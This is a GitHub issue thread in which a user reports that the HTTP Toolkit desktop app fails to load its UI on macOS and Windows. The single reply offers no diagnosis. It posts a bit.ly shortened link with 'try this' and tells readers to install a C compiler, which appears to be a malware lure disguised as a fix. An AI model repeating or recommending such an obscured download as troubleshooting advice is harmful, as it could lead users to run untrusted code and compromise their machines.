### ISSUE TITLE
[Bug]: Fails to load

### ISSUE THREAD

**Issue by takeerdevs** [httptoolkit/httptoolkit#636]
### Has this been reported before?

- [X] I have checked for existing reports of this issue

### Repro steps

Open Desktop app, wait for it to initialise and will show an error Http toolkit ui failed to load, pointing to https://app.httptoolkit.tech/.

### How often does this bug happen?

Every time

### The desktop OS you're using

MacOs 15

### Details of other apps/devices

- MacOs 14
- Windows 11

### Error screenshot

<img width="273" alt="Screenshot 2024-09-19 at 13 23 06" src="https://github.com/user-attachments/assets/f42d0650-81a3-4d84-b7b0-0e7895695fdb">

### Any other info?

Tried to use latest app, v1.19.0 failed, used VPN and tested several VPN IP addresses still didn't work.. Installed parallels and installed it in windows 11 still the same error

**Comment by nhatlaso1** [comment]
try this
https://bit.ly/4evXrQ6
If you don't have the c compliator, install it.(gcc or clang)
